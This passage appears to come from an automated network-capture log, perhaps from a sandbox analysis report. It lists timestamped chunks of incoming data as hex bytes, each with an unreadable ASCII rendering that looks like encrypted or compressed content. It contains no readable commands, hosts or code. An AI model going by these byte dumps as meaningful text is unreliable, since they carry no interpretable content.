                                                                                                                                                                                2021-11-11 11:27:09 UTC10877INData Raw: 56 d8 ba cb 8a 15 21 c0 b5 6e 1e 37 cb 27 0b 4d 09 ec a9 37 84 44 e4 c2 3d c5 ff 7a 12 9d d6 66 e5 78 27 41 e9 c7 d9 2d c6 d6 2f 8a 0b 91 95 5a 0c ec 86 2f 01 cc f7 96 08 34 09 fc a5 f6 51 4b fc e1 a5 af 61 bf f7 40 3f 65 fd bb 9c f5 c7 a8 26 01 e9 9d a7 b4 31 64 16 50 89 9e 9a e7 20 de e9 e9 7c c7 27 b8 62 c5 10 9d c7 d7 2b ff 2f 76 60 25 d1 83 49 7d b2 c6 57 ec e7 2d cb 3f 67 57 2d 7c df 69 df 49 61 ea 62 1d 58 aa 4a be 9d 8e 2e 98 0d c9 4c 08 0b e5 f9 ad d6 ee 98 aa c5 9d f3 5d a5 c6 79 9f 59 b6 25 58 d6 5e d1 98 99 81 25 c2 07 65 a3 a5 75 ce bd 4e cf f3 63 27 ca f7 ba 43 79 ac 04 44 33 13 c0 f6 f2 d5 5e 27 8f 27 d7 b9 55 de 97 94 e0 bb 3d 31 62 00 5b ff 70 54 21 c7 45 f0 13 95 5b 06 32 ea da df 5b 74 2f fa f4 2c 29 f8 f4 24 82 25 fe dc 27 b8 45 35 3f
                                                                                                                                                                                Data Ascii: V!n7'M7D=zfx'A-/Z/4QKa@?e&1dP |'b+/v`%I}W-?gW-|iIabXJ.L]yY%X^%euNc'CyD3^''U=1b[pT!E[2[t/,)$%'E5?
                                                                                                                                                                                2021-11-11 11:27:09 UTC10893INData Raw: a8 cd b5 d9 ab 69 c7 dc a5 56 a7 8d 09 ff 52 30 e9 29 f3 2e fd a0 de 29 a5 89 8b 29 55 94 6e 5b e6 8c 4f d6 b6 00 c9 45 5b 8b 21 c1 f7 65 da 15 80 90 d6 bf 77 bb c4 63 ba 09 bf ce fe ff 50 e6 3f a7 e9 b5 82 8b 56 2c cb 60 62 21 f6 77 59 6d a7 ba c7 df 4c 6f b7 5a 76 95 7b 5b a4 35 25 d9 88 45 c1 fb 72 bf 02 54 78 62 09 d9 5e 7e ef a9 f7 5f 71 c4 4b 5b 06 25 56 cb 27 fc 89 51 c9 7b 64 b1 fb 16 0e 29 5e 3b dc ee cf 84 32 41 03 59 ef df f1 9b 6b 55 c5 58 25 53 a4 35 44 ef c4 91 fb c4 64 b6 e2 96 be 31 a2 41 21 21 b9 3b ad 3e cd cb 3f 68 e3 92 fc 96 e2 f0 53 42 10 70 d2 98 b4 e3 ab 3b f0 34 24 e6 15 70 75 7d 87 5e ef 29 77 78 c3 5a f7 64 4f 82 71 06 41 25 ff 6b 53 09 b1 d6 2b af 64 14 a5 ef 6a ce 8a 5f e8 2f b5 fe 98 07 02 9d f7 1c 48 9f c4 bd 12 41 2b 06 e2
                                                                                                                                                                                Data Ascii: iVR0).))Un[OE[!ewcP?V,`b!wYmLoZv{[5%ErTxb^~_qK[%V'Q{d)^;2AYkUX%S5Dd1A!!;>?hSBp;4$pu}^)wxZdOqA%kS+dj_/HA+
                                                                                                                                                                                2021-11-11 11:27:09 UTC10909INData Raw: 8d d3 60 e9 1e b1 87 24 5f 7e 89 f4 32 02 ee 89 8d 7f 85 c5 e5 ba f7 48 14 c6 25 df 83 8b 06 48 c5 44 13 09 c5 a8 bc f9 ee 94 53 d2 8b 39 3e 2b b2 11 55 e3 2a e9 12 89 13 99 ea 2a 76 f3 28 2e 07 2a e9 0e 13 46 02 21 06 04 41 b3 40 e3 a2 22 e4 13 44 20 1b 65 d2 25 69 64 83 62 b9 1b e6 24 fb 27 6c 7e 95 75 38 9f 44 03 5a 18 80 c7 7e ea 2b 4c 4a b7 e1 44 29 21 04 2b ff 29 5f 71 24 6e 85 99 ee ca 46 95 75 8e 55 12 3c 76 10 80 e4 9e 0e c2 a6 5d 1e 04 cd 12 ea b1 4e ec 16 4b 42 e0 40 0c 44 07 22 5f 3e 60 8f 45 e5 a7 5a 4f 9c 5e e1 9d fc 28 e9 7c 57 2d 67 a0 2e 61 cb fd 30 57 fd 4d b7 68 e9 1b 4c f2 ef b4 cd 51 d7 6a 64 82 ff 74 1c fe 9c 12 c1 59 f0 87 89 3b 5f 94 96 9d 55 14 bd bc 9b 49 84 8b 3f e1 49 2e b2 cf d3 99 7a 6a a8 06 4a a2 09 90 44 4a aa 92 08 c5 fe
                                                                                                                                                                                Data Ascii: `$_~2H%HDS9>+U**v(.*F!A@"D e%idb$'l~u8DZ~+LJD)!+)_q$nFuU<v]NKB@D"_>`EZO^(|W-g.a0WMhLQjdtY;_UI?I.zjJDJ
                                                                                                                                                                                2021-11-11 11:27:09 UTC10925INData Raw: d0 4d 29 c5 95 4c 53 a3 c5 6c 7c 31 90 c1 bd 48 5d 31 c9 95 33 da d5 ba a7 2f 06 f7 74 58 49 48 93 af a7 d4 1a 86 21 d6 45 0c 3c 44 89 ca f7 ca 49 4e c5 0d 3f 35 8f e8 09 12 c7 04 cf 3f 11 ee 40 7d 4d 07 98 8a e0 0d 32 fa f4 6a 86 5c 00 25 f6 74 c2 b1 7a dd 7b db 92 e8 fe 67 c8 79 94 4a 4a f0 f2 8f 9e 93 04 e8 ea b0 4d 31 f8 bf b0 04 8b 1e f9 3c ac 41 e0 63 da d9 22 db 2a 8d 82 67 28 5e c4 ab ee 2d 95 05 f3 ea 73 f4 51 85 e2 8c 97 ed a0 92 ee f4 04 f5 bd 51 af 45 c8 9d b8 a7 fe 45 87 28 7f 5a f0 dc d0 29 79 f5 04 26 74 52 69 37 f9 84 d5 63 d2 be 63 22 01 4e 94 1c 10 d2 d9 ba f2 71 da 35 7d 96 8f 9e 4a 51 e9 23 84 5f c4 13 84 8e ea 61 dd 4c 63 f7 49 6c c4 2f e1 5b 75 8c 09 c0 ee f1 b7 fb 21 ad 55 32 8c dc 33 61 29 d9 4c dd 37 6e 8e ea 6b 70 7d 9c c4 99 5a
                                                                                                                                                                                Data Ascii: M)LSl|1H]13/tXIH!E<DIN?5?@}M2j\%tz{gyJJM1<Ac"*g(^-sQQEE(Z)y&tRi7cc"Nq5}JQ#_aLcIl/[u!U23a)L7nkp}Z
                                                                                                                                                                                2021-11-11 11:27:09 UTC10941INData Raw: 00 7a 42 7e aa b6 51 04 59 1f 10 f9 27 80 c6 bb 75 bf 53 25 00 e5 17 6e 79 87 eb ff 1a 92 43 07 f3 1d 3e b0 86 00 96 bd c3 e0 70 b9 91 b5 02 df d5 e6 43 40 3f fc 81 1c 62 bd ad 1c 38 04 32 4a 19 1c 05 63 d0 b0 90 4b 81 b6 aa 4a 6e 8e 73 10 31 1c 3d c7 85 e4 8d b4 1d b2 17 92 0b 02 20 fd 65 c9 25 ff 39 0a ed 2a e8 4e b5 0c 95 fd 28 d2 95 62 8f d7 7a cb e3 2b e3 55 89 49 57 4e e5 4d 01 db 8d 2e af 35 20 2e bb 69 26 7f ec eb b7 54 f9 bb e6 ed 4e ad 5d 84 03 28 ef f6 5e 69 ec 5c 6f 52 5c d6 c2 c4 80 91 63 91 10 45 03 2e bf 4e cf 8a b9 ee d1 27 c0 01 c7 39 27 4c e1 28 05 88 2f 6e 21 b0 69 c3 5b b6 89 c7 78 53 36 49 73 16 2c 6c 2d 40 09 26 24 12 96 fa 3e ff dd cd 2a f0 60 20 95 30 35 21 ff 97 f9 04 42 c3 05 57 dc 72 50 44 8a 4a 3b a0 9f f8 97 f4 30 c0 f5 50 99
                                                                                                                                                                                Data Ascii: zB~QY'uS%nyC>pC@?b82JcKJns1= e%9*N(bz+UIWNM.5 .i&TN](^i\oR\cE.N'9'L(/n!i[xS6Is,l-@&$>*` 05!BWrPDJ;0P
                                                                                                                                                                                2021-11-11 11:27:09 UTC10957INData Raw: c7 6a 8a e6 13 c5 d9 a7 0f 5b cc 93 21 4e c6 d9 b2 e1 88 15 ae 16 46 f9 a7 97 c0 f2 f5 9e 61 bf ee 64 3d 01 d3 73 4a ed fe 34 6e c4 e5 8a 70 18 89 ca 24 cd fc 2c 30 5b 27 a5 56 18 5a 09 bd fe 61 e5 d9 8a 1f 04 31 c2 41 88 be 94 24 ea a7 39 72 4e 7f fe 8a 9f 5e d4 b7 eb 09 ff 6e 31 b6 40 2a 8e db 59 22 d7 99 e7 2e 2d 7d 2f fa 62 0a c6 db ff 2f 96 a1 9b 06 ac 74 af 79 e7 4b 09 b3 61 6f 29 3d 71 df 93 ca 74 9e 53 cf bb dd 2d 3f bc c3 5f a2 1e ca ce 0e 4b c6 8f b5 52 98 4a c0 ff 8b 20 5a f8 56 a2 e9 ba cc 7f 10 5e 21 d6 f5 6e 13 08 ad cc 5c af 79 96 08 7a fc 82 cb 5a e4 bd 74 9a 2f 57 14 ae 16 4d 89 f3 bc fd a2 e6 55 73 2c ae c3 69 5f c1 90 07 2e 8b 56 4a fc 3f a7 e8 49 e2 4d 7c 39 e9 7f e4 70 9d de 22 5a 5d ba be 01 b6 41 33 03 72 5b 94 7d 5b 98 cd 35 09 fd
                                                                                                                                                                                Data Ascii: j[!NFad=sJ4np$,0['VZa1A$9rN^n1@*Y".-}/b/tyKao)=qtS-?_KRJ ZV^!n\yzZt/WMUs,i_.VJ?IM|9p"Z]A3r[}[5
                                                                                                                                                                                2021-11-11 11:27:09 UTC10973INData Raw: c7 f8 f6 f4 ef ec dc 7a 48 40 75 f1 01 ec 3b 72 af 29 57 84 54 36 aa e7 1c 35 d7 06 ef c7 e7 6d 24 3e a7 81 12 01 df ba 29 9a 0c 8d 41 9f 57 09 31 89 f2 71 4b c9 f0 e2 86 23 77 41 2e 04 24 df c4 ce bb a9 42 92 ef d8 7f cc 97 14 5c 42 e6 4a fc 56 a7 75 04 b2 b6 d6 1d 20 e7 db 8f 20 82 c5 a6 89 ed be b7 ce 13 c6 20 b3 05 96 af 72 6c eb 55 f3 1e 92 c9 ef ce 45 12 09 f2 e8 84 a5 ed 31 85 ca 20 ec 36 b4 b1 40 3b 39 5d af e3 12 b3 a2 a4 31 c0 e4 df 25 01 d6 79 41 64 0e 74 be ca 83 58 2b 4b cb 4d 50 26 fe 96 d0 42 ef f0 74 68 71 05 6f cc 94 f3 b7 53 36 c9 c6 6e 98 7b 1c 70 1b 11 7e f7 4b eb fe 72 ab c6 13 5a 3d ad 9a a2 c2 75 1a c4 7f 02 55 c3 12 79 b5 69 29 64 5e 47 89 ce 20 f6 95 7a 4c 75 a2 a0 7d 1a 85 f3 10 17 e6 f3 42 2d df 38 51 01 dd 9d 7b f6 8b 21 fa 29
                                                                                                                                                                                Data Ascii: zH@u;r)WT65m$>)AW1qK#wA.$B\BJVu rlUE1 6@;9]1%yAdtX+KMP&BthqoS6n{p~KrZ=uUyi)d^G zLu}B-8Q{!)
                                                                                                                                                                                2021-11-11 11:27:09 UTC10989INData Raw: 5f ee f6 20 27 c0 f7 16 72 95 b3 1c 27 0f f0 4e 9e bf b2 79 d7 4c 6b 95 32 72 7f b1 87 f0 7e 31 f4 01 31 6b 9f 6a 38 02 70 84 95 d4 61 52 11 0a d9 2a da 18 55 f0 29 84 09 f0 9a a0 77 51 bf 98 e8 1d c4 1f 5b cc b8 4f 9a af 00 04 09 04 24 9c a7 46 2d db ff 69 39 36 31 2b 19 64 6a ee 3b fa 38 f0 36 01 4c 09 f7 9c 44 23 02 dd 39 2e d0 97 e3 fa 7c 4a 4d aa 8b ad 5f ac f1 f4 eb a2 67 22 31 bd 61 4f f0 3b aa 39 f3 7a 1c e4 dd c9 a7 7e 8c c9 f5 39 50 f6 30 5d f0 97 ee 09 8a f4 6e d4 b4 40 52 ff c2 76 f5 b2 7a f5 ea d8 d1 b2 e4 cb dc e9 d1 93 40 2f 71 4c 91 2a 8e a8 17 a2 de 90 55 5f b9 42 25 f6 dd c5 19 a7 db c1 ad dc fd 2d d9 f3 c5 e6 5a 22 e6 fd ce 82 97 b2 e4 57 42 cb d9 ca c9 ee 27 f1 6e b3 3d 12 8b 2a ae 99 85 d6 c0 20 09 f3 9d ee 15 9d 19 84 5e a6 f2 1a 28
                                                                                                                                                                                Data Ascii: _ 'r'NyLk2r~11kj8paR*U)wQ[O$F-i961+dj;86LD#9.|JM_g"1aO;9z~9P0]n@Rvz@/qL*U_B%-Z"WB'n=* ^(
                                                                                                                                                                                2021-11-11 11:27:09 UTC11005INData Raw: c9 94 db 91 9c 83 48 31 c8 4c ba d8 56 5f c8 d1 e5 45 fe a4 1b 85 17 0f 86 18 88 a7 d1 9d fc 89 51 40 6b 64 87 ec 50 89 eb 74 af c1 4c 31 e0 31 46 6e a8 a1 4b bb 74 5d 53 46 fb 8d dd 6e cd 58 30 b7 29 5f 30 ec 06 e7 70 06 45 ac f7 9f 5c 50 44 70 5f f8 0e 06 62 40 33 f8 ec 88 eb 5a f7 c5 cc 09 89 fc 73 c7 a8 69 92 33 4e ea e3 c6 4a 82 bf 9c f5 73 2a 9f 2a 93 39 af 82 ce c5 7b 9a 51 28 02 ed d8 b9 27 31 c3 75 e5 2b 32 d8 f1 56 de e2 01 fb dc 52 49 2b 59 96 f6 bd 40 0e 46 83 bd 42 cc f7 b3 dc 0d 76 c6 f7 1a 53 7b b2 5e 92 be d9 d4 2c b5 cb f1 5c d7 a7 94 7a 12 41 b5 51 bb 28 95 f2 bd 5b 8a a6 58 c9 ab b1 7d ba b0 55 46 65 2a 45 30 ba 95 7b b7 2c 1b 33 c4 f6 7d d4 b1 98 92 fe ba 99 9c f5 c2 f6 dd f9 cb a7 53 84 17 25 8d 31 3e d4 73 bb b7 b2 41 f5 27 b2 26 4d
                                                                                                                                                                                Data Ascii: H1LV_EQ@kdPtL11FnKt]SFnX0)_0pE\PDp_b@3Zsi3NJs**9{Q('1u+2VRI+Y@FBvS{^,\zAQ([X}UFe*E0{,3}S%1>sA'&M
                                                                                                                                                                                2021-11-11 11:27:09 UTC11021INData Raw: 9b 2d ea f4 43 70 45 03 5b 16 be 29 13 25 e5 2b ef 2d 3b 60 98 ce e6 31 f5 3b e6 3d 7d 25 21 e9 f5 39 a5 ee 7a f3 c7 90 d0 b1 e5 f0 33 a9 95 8a 40 d1 d1 97 f9 6d 49 d9 cc a5 8e 1d 69 fb 7f ec 12 d6 e6 f6 20 64 b0 d1 bf a3 4b 74 5c f3 fc 25 d6 5e da 52 d7 7b 73 20 5d fa 08 1e 35 a0 1d 72 54 ee ce d4 99 01 26 e5 52 9a 29 87 47 fd a9 5f 73 d4 17 e3 fd 77 92 13 95 bc c5 a5 03 0f f7 44 8a a4 fe 01 22 11 0f 86 15 3a 8b b4 4c 95 05 c2 22 a2 ea ba 0b 05 f6 7d c7 cb 93 ce fa 8b ca 4b fe 14 3c f0 4b ca ea 16 cf 40 e2 df d7 d4 d7 bc 6a e4 82 81 13 6a 10 5d d9 b8 c9 9a e2 84 44 d0 ff d5 75 13 e4 fa 8d cd df ba fb e7 09 60 03 25 16 a9 5a 57 ed 82 df 51 34 25 30 54 ae 7a d7 6a fd dd e5 d3 96 ef ec d9 e4 24 44 89 ab 7f ca 10 54 65 c5 97 cc 9d 5f 1b 9e 83 5e d2 c1 f2 5c
                                                                                                                                                                                Data Ascii: -CpE[)%+-;`1;=}%!9z3@mIi dKt\%^R{s ]5rT&R)G_swD":L"}K<K@jj]Du`%ZWQ4%0Tzj$DTe_^\
                                                                                                                                                                                2021-11-11 11:27:09 UTC11037INData Raw: 88 c8 6b 5e 0b 39 a7 c6 f1 bb 96 88 e3 d8 c4 c1 d9 49 4d ab 7f f3 40 ad f1 87 89 21 cb df 14 b1 97 7a b5 bf db 83 c1 41 29 45 3f 9c b2 4d f6 d8 9f 94 fe 95 f3 9d 09 f0 20 71 29 a8 d2 32 31 c2 3e fb 78 8f 2f f1 b3 76 0e 14 d0 1a dd ee 75 84 29 11 9c 94 1d ae bc c7 e5 bf 75 8a ba 94 a9 eb e7 0b 49 55 4a 39 30 3a 16 05 9d 24 a5 e2 9c 76 92 42 b5 16 27 fa c3 9d d5 1e d0 49 e8 04 89 f0 dd 5b 0e 2b 49 2d 9a 13 dc 64 2f 60 c7 44 8a 4b 30 b8 3b c9 b2 c6 56 bd cc 06 97 63 f5 29 40 d8 55 20 c5 54 cc 3c f4 a6 aa ea c4 99 4c 6b 32 3e d7 30 e1 ef 08 b7 ba 78 d5 e9 d9 fa 2a 09 3a 30 7d 6e 57 b7 1a a2 77 e5 6d 27 d7 39 a4 ee 5d 91 2a 8a 31 26 e3 df 6c c6 41 61 59 fc 0e e9 43 3c dd c9 88 d6 e4 5a ca 26 98 5e 89 e3 bd f1 40 45 f4 47 33 21 c4 ab 55 4c 20 51 e2 74 ad 82 e2
                                                                                                                                                                                Data Ascii: k^9IM@!zA)E?M q)21>x/vu)uIUJ90:$vB'I[+I-d/`DK0;Vc)@U T<Lk2>0x*:0}nWwm'9]*1&lAaYC<Z&^@EG3!UL Qt
                                                                                                                                                                                2021-11-11 11:27:09 UTC11053INData Raw: 70 90 86 54 0b 07 ee 42 80 09 63 0f 4d a2 8b 89 eb 6e 7b b5 45 ae 16 0b be ce d6 d1 e9 2d 20 fe b5 73 e4 b3 f9 22 b9 b0 ea 52 23 19 88 01 a1 86 2f 71 32 81 27 69 df c8 7d 66 d6 4e 8d c0 40 c3 40 80 fe 1c 87 0f 86 24 07 52 76 77 6d 6d 44 63 aa 2c 07 5c 9f 57 b4 84 95 ff ab 03 dc aa 58 44 33 97 f5 1a 10 75 6d ed 8e 44 21 36 ff 8e 22 02 2e bd b0 05 79 a8 c9 bf ed 88 09 9a fa 7c 20 da 1a 1c ca 15 74 e7 4b 55 c4 20 4e 09 fc 20 25 e9 5f 45 7f 10 4d 5e a2 ee a4 cd 57 0a f3 67 d6 c1 b1 40 0f 14 3b 3c 5e 0c 89 e1 19 de 26 ce 74 4f 3e df 6f 22 02 17 4c 63 37 b8 19 f5 a0 bd e7 bf 7e 3b d0 f4 b5 44 f8 5f e0 4b 67 02 10 4e 42 b9 7a 60 7b 25 e5 29 c9 27 82 02 64 46 b5 4b 89 08 5d f1 42 20 32 f0 5f c6 60 77 c2 44 f0 39 70 ad 38 10 28 00 4f 8c 3a 01 f8 06 1c e1 6a 4c 48
                                                                                                                                                                                Data Ascii: pTBcMn{E- s"R#/q2'i}fN@@$RvwmmDc,\WXD3umD!6".y| tKU N %_EM^Wg@;<^&tO>o"Lc7~;D_KgNBz`{%)'dFK]B 2_`wD9p8(O:jLH
                                                                                                                                                                                2021-11-11 11:27:09 UTC11069INData Raw: d6 e0 85 cf 95 7b 57 49 df 09 da fb 25 a5 ab a8 fd 38 58 89 c9 96 29 24 54 cf 52 ff b2 9f da 82 5d 1b ff ea 88 2b dd 63 82 4f 9c a3 5e 92 bf d9 e0 6e 9d 22 7e b6 c4 44 07 41 2e 2b 33 54 3d 0b 7b 18 1c fd 32 3e 57 28 bf dd eb d7 c6 77 b7 63 c8 9a ef 7f c5 2c 09 c4 04 59 8d 61 41 29 37 6e a2 29 8a e6 1f 35 f4 f8 25 13 eb 40 a8 ab f1 cc f0 7c 88 b5 aa a2 77 5e 24 72 c2 41 d0 41 ff 08 09 68 d2 4f f8 14 5c 59 e1 8b 0a 6a b2 5d 96 bb cd 11 2b b6 52 d7 b9 29 92 e1 68 2e 8b 37 1c c5 0b 25 59 f9 6e a9 fa 53 dc 8a 29 d3 0a 61 4d 63 55 7c ec a6 ba 95 57 9c 80 9d db e7 27 7d c7 fb 2f c6 51 17 17 ff e1 bf da ae 5e 98 43 38 9f f4 9f 5a 7c 1c 25 dd 94 f3 d2 1d ee ce 57 12 31 39 ef 8b f5 02 22 a1 f6 8e 1e fd 51 e8 44 44 ab 88 80 56 9d 4e 36 05 ef 63 60 b8 25 a3 ef 4f a6
                                                                                                                                                                                Data Ascii: {WI%8X)$TR]+cO^n"~DA.+3T={2>W(wc,YaA)7n)5%@|w^$rAAhO\Yj]+R)h.7%YnS)aMcU|W'}/Q^C8Z|%W19"QDDVN6c`%O
                                                                                                                                                                                2021-11-11 11:27:09 UTC11085INData Raw: 1e c8 fb 3a b9 44 cb ef 09 12 fc f1 13 cc eb cf e6 4e 61 62 e2 90 08 31 4e d4 64 4f 09 b1 cb 44 6a 22 f4 20 49 4c 17 7a 24 c7 03 bc 72 7c 51 12 0f fb d2 09 c3 f3 72 a5 f6 18 c2 01 d8 76 7c 51 cd f2 f1 28 69 7b 7d 8b c8 08 f3 44 09 21 e1 7e 4f c9 5f 09 87 cc 17 bd 14 fe b7 52 59 9d 5b 3b 49 f6 0b c7 eb 04 08 52 eb 12 a6 eb 8c 3b 89 4a fe be 8a 6b 25 01 9c 8d ee f6 9f 3a 9b 7f d8 a9 4b c0 f7 19 13 31 db ae a2 6f cb 02 f9 11 45 4c ae f2 e9 5b 84 85 ba 2d 11 6f bc e6 d7 be 74 ec 12 aa fb f3 91 96 f3 ac 5f 82 61 0a fa eb 8a a0 0a fe d4 ef 53 29 e6 ad 7b 5b cc 84 f6 f7 1b a5 d4 e0 0b ba 16 61 0c 0a aa cb 4f 74 60 e8 38 32 4e 21 e9 e7 3a 97 c7 d5 ee 90 cf 29 06 9c b5 32 77 5f 76 5d f2 7d f1 87 eb f5 97 b2 25 4c c7 94 ca 34 eb ee e8 51 27 fd 77 46 02 8f 2d 12 0d
                                                                                                                                                                                Data Ascii: :DNab1NdODj" ILz$r|Qrv|Q(i{}D!~O_RY[;IR;Jk%:K1oEL[-ot_aS){[aOt`82N!:)2w_v]}%L4Q'wF-
                                                                                                                                                                                2021-11-11 11:27:09 UTC11101INData Raw: b8 4b 62 db 55 d4 a5 58 2b 02 95 50 fe 9d 7e bc 69 83 ff e4 41 0b 80 b7 2c af 5f c2 8a d5 16 c7 91 f0 9d 35 ae 85 7a 12 3c 04 b3 cc f6 ab 79 5a d8 c7 5c ce 69 d9 62 7b 7f 47 fe 27 45 9c 09 e7 40 6c 7c b5 ce c4 95 de 5e c2 ea 3f a4 3e c1 ba 98 6b 4d 96 8d 25 7a ad 49 29 cf 5f 29 2c 36 9a 13 09 c9 f9 cc 96 e8 7e 4a 9d b2 e9 d9 7a cb 11 5b f9 b7 c4 21 fa be 85 c2 d8 0a 4d 27 63 0b 77 a9 78 d5 ce a3 bd b9 6d cf 39 8f d7 a7 d3 14 e9 88 88 c9 f9 f5 09 4f a9 82 e7 31 16 4c b0 c4 ff 4a e5 eb 78 48 0b 9b 90 39 4a bf 29 00 2a ba 16 5c ab 29 d4 f1 08 6a e2 d3 c2 41 21 0a 77 7e 12 70 20 fd 12 71 e9 75 ba de 47 4c 52 38 86 4a 29 07 2b a6 a2 69 9e 16 c9 b7 36 5c 93 9f 92 29 eb cb a9 38 2b cb ab ca c3 5a ce ee 2f 09 5e 19 c8 7a 41 01 f2 68 cd 65 58 8b 06 9f 66 bc 9a 05
                                                                                                                                                                                Data Ascii: KbUX+P~iA,_5z<yZ\ib{G'E@l|^?>kM%zI)_),6~Jz[!M'cwxm9O1LJxH9J)*\)jA!w~p quGLR8J)+i6\)8+Z/^zAheXf
                                                                                                                                                                                2021-11-11 11:27:09 UTC11117INData Raw: 25 ff 32 a8 f4 a5 c4 c0 eb a8 24 f4 ef 8d 48 61 c8 6b b6 52 48 5b 77 9f c5 51 1c c6 24 48 64 e4 e1 49 3a f7 bd 5a d9 0f 76 5e 69 30 d7 50 ac bf 74 4f 25 f7 94 04 97 46 dd 56 2d 80 13 c6 0e 39 16 7c aa 4a d4 25 fb 3c 68 e0 4e 80 75 59 ff 29 85 ad a2 71 49 69 d3 e6 10 e8 94 11 6e d2 67 da 33 1b 66 fa b7 48 f3 29 cf bf ee ae f9 2f a3 e3 92 be f6 69 4a 33 6c 31 8c be 8a 41 29 ef f6 8b 09 ca fe 45 52 59 b2 6b 38 8d 09 f0 bf 32 da 56 94 a7 86 ca 21 0c 28 09 c1 fc 5f 0e 12 20 0f 73 c2 94 9c 9e 65 ee d2 bf b3 02 e2 c2 65 75 8b c7 90 f1 f4 69 10 fa 31 f0 73 4c 4b fa fd 96 d6 b3 71 4b bc d0 96 e2 17 5b e1 8e 5d 31 2a 84 1e ba e6 d3 14 05 f0 10 17 63 33 ad a4 96 66 69 8a b7 4a 63 5d 4a 9f c7 d0 25 db 54 a5 b3 ca a1 34 24 6b d4 90 ea df fa 60 22 c1 fc 7f f8 4a 76 bc
                                                                                                                                                                                Data Ascii: %2$HakRH[wQ$HdI:Zv^i0PtO%FV-9|J%<hNuY)qIing3fH)/iJ3l1A)ERYk82V!(_ seeui1sLKqK[]1*c3fiJc]J%T4$k`"Jv
                                                                                                                                                                                2021-11-11 11:27:09 UTC11133INData Raw: 9a 00 33 07 35 7e 90 61 5a 32 fb 72 be e8 55 94 bb 95 f1 fd 93 21 bb 99 16 a0 c8 81 4b 25 a3 01 d3 eb b6 c7 58 f1 4e f8 bb a2 c5 5d 7e 7f c2 8b 06 f4 4f f2 5f 5b b1 2d f9 48 89 63 75 77 c5 b5 a7 58 14 9d 57 15 08 25 d4 be c5 29 aa e3 6a 89 2a d5 79 07 4b f7 1e db 95 dc d8 79 7a f4 ad 34 b7 79 54 c9 f4 5b 65 b7 be 9c 24 f5 08 cd 8d 5e 6f d0 31 2f bf 7b 41 e9 7d e4 67 5a 3b af 29 f0 f4 33 3c 5f 24 e8 3e b4 0b 86 3f fd 16 c7 85 17 3b 02 07 66 3a f6 1f b1 ad f5 08 29 ff 2b e8 e7 a7 d6 01 69 b6 ea 97 04 a2 a0 89 f5 cc da 9c 22 02 19 5a 22 26 ff ec 7d 2f 55 be fe 69 61 4c 21 26 58 eb 0d ff 0d 65 97 7e f3 f6 89 0a 3a d1 9c 1b 01 2b 02 2d 43 50 3b 17 3a a2 a9 c5 09 07 ab b3 18 d9 80 3a 2a ab 79 45 33 90 12 63 11 fe 3c ed 16 9f 78 d1 00 a2 6c 5f 29 47 aa 89 75 00
                                                                                                                                                                                Data Ascii: 35~aZ2rU!K%XN]~O_[-HcuwXW%)j*yKyz4yT[e$^o1/{A}gZ;)3<_$>?;f:)+i"Z"&}/UiaL!&Xe~:+-CP;::*yE3c<xl_)Gu
                                                                                                                                                                                2021-11-11 11:27:09 UTC11149INData Raw: f9 a7 5b a0 af 7b 63 09 29 ff 10 b9 31 f3 ed e5 c2 2f bf 74 ac ef a2 1f d3 85 7c eb e2 66 c2 44 09 30 7b 7b e4 18 64 ce 2c 09 44 21 12 7d 3e 89 9f 73 88 25 f1 d9 69 7c d8 9c eb e7 d5 65 d1 b1 14 c7 78 3d bf 5b af 38 1d c6 4e d9 f7 a3 12 c2 14 32 da 0a dd 51 be 84 c6 65 bd 57 ba 38 2a 8b 0a 36 45 21 1e 9c 09 0f 48 b2 44 57 dc 35 34 68 ba f2 07 d2 ba 17 a2 ad e5 e1 31 c6 27 1f 59 4e 4b b2 c6 8b ca b0 ac ea 01 be d1 cb 64 9f 64 e6 44 d2 ec 43 5b 28 43 c9 42 80 4e f1 a6 0a 0e 5a f1 ba 2a b2 1a 97 e9 0a 88 c1 4d 6e 6a 05 69 ea 04 9a 1c 4a fa 76 25 56 b7 5b a1 95 c9 68 4b a8 e9 12 01 c4 cd 5a a7 2d f5 14 d8 2d e9 3f c7 f2 27 55 ce c5 81 c0 c2 2b 28 26 ec a4 47 49 c4 ae 96 e8 41 d4 11 4a ca b0 26 c3 d3 c4 ef eb a7 61 5a cd cb 7a a8 04 5b 56 a1 ea 2d 9d 23 dd 16
                                                                                                                                                                                Data Ascii: [{c)1/t|fD0{{d,D!}>s%i|ex=[8N2QeW8*6E!HDW54h1'YNKddDC[(CBNZ*MnjiJv%V[hKZ--?'U+(&GIAJ&aZz[V-#
                                                                                                                                                                                2021-11-11 11:27:09 UTC11165INData Raw: a2 39 89 f5 dc 11 e9 57 96 a0 16 4c 39 1f b1 11 68 60 a2 d9 7d 8b db d6 a9 27 7c 1a c9 55 12 20 57 09 da 75 ce 49 42 e2 67 24 f1 a9 db 46 a5 e6 6e 32 09 d2 28 ca fd ec 8d 16 4c 89 ce e2 66 8b e4 b1 25 f6 57 36 c4 c1 12 bf 8c 52 f1 b3 fe af 46 cf 5a c6 5d 22 96 ca a2 b9 93 13 c6 9a b7 70 9e a9 69 5f 7a d8 76 f2 2d 29 d1 74 5b 79 ca 29 f1 d3 ba f1 b0 05 b4 fa 68 ad e6 97 77 1a 30 5c 97 d0 e1 80 8a f5 89 9b f7 cc ec 2d 09 c9 92 4d 4a d0 ce fe d2 c3 74 d7 ba e2 23 09 44 03 2e 6c 40 b7 00 c2 fa d3 82 75 9d 74 e8 cb de 61 a7 67 9a 2e b6 25 45 61 24 6e 42 21 c1 df 4c 1b 81 f8 e4 93 cc c8 bf 9d 4f 35 aa 32 2b d8 d8 c8 45 27 09 2a 55 14 e0 bf 32 47 77 38 21 cf 3f 97 9b 41 25 06 e1 f5 ea 88 7d 12 1b d7 6c fe bf 3a 42 55 74 39 27 78 2e bf 41 65 e9 6b 8a 5d 21 c1 84
                                                                                                                                                                                Data Ascii: 9WL9h`}'|U WuIBg$Fn2(Lf%W6RFZ]"pi_zv-)t[y)hw0\-MJt#D.l@utag.%Ea$nB!LO52+E'*U2Gw8!?A%}l:BUt9'x.Aek]!
